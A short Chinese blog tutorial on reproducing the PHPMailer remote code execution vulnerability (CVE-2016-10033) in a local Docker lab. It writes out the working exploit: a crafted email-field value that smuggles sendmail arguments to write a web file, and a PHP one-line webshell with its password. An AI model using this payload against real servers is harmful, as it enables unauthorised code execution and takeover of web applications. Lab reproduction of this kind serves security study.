PHPMailer中怎么复现远程命令执行漏洞

PHPMailer中怎么复现远程命令执行漏洞,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

一、漏洞简介

PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。

二、影响版本:

PHPMailer<5.2.18

三、漏洞复现

Docker环境:

dockerrun –rm -it -p8080:80vulnerables/cve-2016-10033

拉去镜像启动环境:

PHPMailer中怎么复现远程命令执行漏洞

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name处随便输入比如“aaa”,在email处输入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马:<?php@eval($_POST['thelostworld']);?>

PHPMailer中怎么复现远程命令执行漏洞

上传完一句话木马后,页面会响应3-5分钟,响应时间较长

PHPMailer中怎么复现远程命令执行漏洞

木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld

PHPMailer中怎么复现远程命令执行漏洞

虚拟终端:

PHPMailer中怎么复现远程命令执行漏洞

使用脚本:

获取脚本后台回复“PHPMailer”获取脚本

PHPMailer中怎么复现远程命令执行漏洞

看完上述内容,你们掌握PHPMailer中怎么复现远程命令执行漏洞的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

原创文章,作者:kepupublish,如若转载,请注明出处:https://blog.ytso.com/231088.html

(0)
上一篇 2022年1月15日
下一篇 2022年1月15日

相关推荐

发表回复

登录后才能评论